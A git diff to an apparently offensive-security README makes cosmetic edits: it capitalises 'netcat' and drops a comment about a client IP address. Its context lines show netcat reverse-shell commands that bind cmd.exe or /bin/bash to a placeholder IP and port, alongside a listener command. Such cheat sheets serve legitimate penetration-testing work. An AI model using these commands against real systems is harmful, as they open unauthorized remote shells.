diff --git a/README.md b/README.md index 1ed6d11..6f86582 100644 --- a/README.md +++ b/README.md @@ -418,12 +418,10 @@ sudo nc –lnvp {PORT} ```
-# {IP ADDRESS}: IP Address of the client from step one (python server) - ## NC Execute - Server [STEP 2] ```bash -# With Netcat installed +# With netcat installed # Usage - Windows nc.exe -e cmd.exe {IP ADDRESS} {PORT} @@ -433,7 +431,7 @@ nc {IP ADDRESS} {PORT} –e /bin/bash # =========================================== -# Without Netcat installed +# Without netcat installed # Usage - transfer payload via file transfer and execute binary